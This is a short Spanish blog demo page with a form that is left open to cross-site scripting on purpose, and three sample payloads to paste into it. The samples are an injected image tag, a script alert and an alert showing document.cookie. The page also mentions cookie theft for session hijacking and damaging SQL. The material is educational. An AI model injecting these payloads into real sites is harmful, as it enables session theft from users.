Quevidaesta.com >> Volver al post

Ejemplo de formulario vulnerable a ataques XSS.

Algunos ejemplos sencillos para comprobar que este formulario es vulnerable. Tan sólo copiar/pegar en el formulario:

+ Con esto insertamos la etiqueta de una imagen en la página:

<img src=http://us.i1.yimg.com/us.yimg.com/i/ww/beta/y3.gif>

+ Con esto insertamos un poco de Javascript:

<script>alert(String.fromCharCode(77,69,32,67,79,76,69))</script>

+ Con este sacamos la cookie del usuario (si tiene):

<script>alert(document.cookie)</script>

Los ejemplos son inofensivos en este caso, pero podrían ser más avanzados y robar cookies con lo que "secuestrar" una sesión o ejecutar una sentencia SQL que dañe la base de datos. Si tienes alguno curioso déjalo en los comments.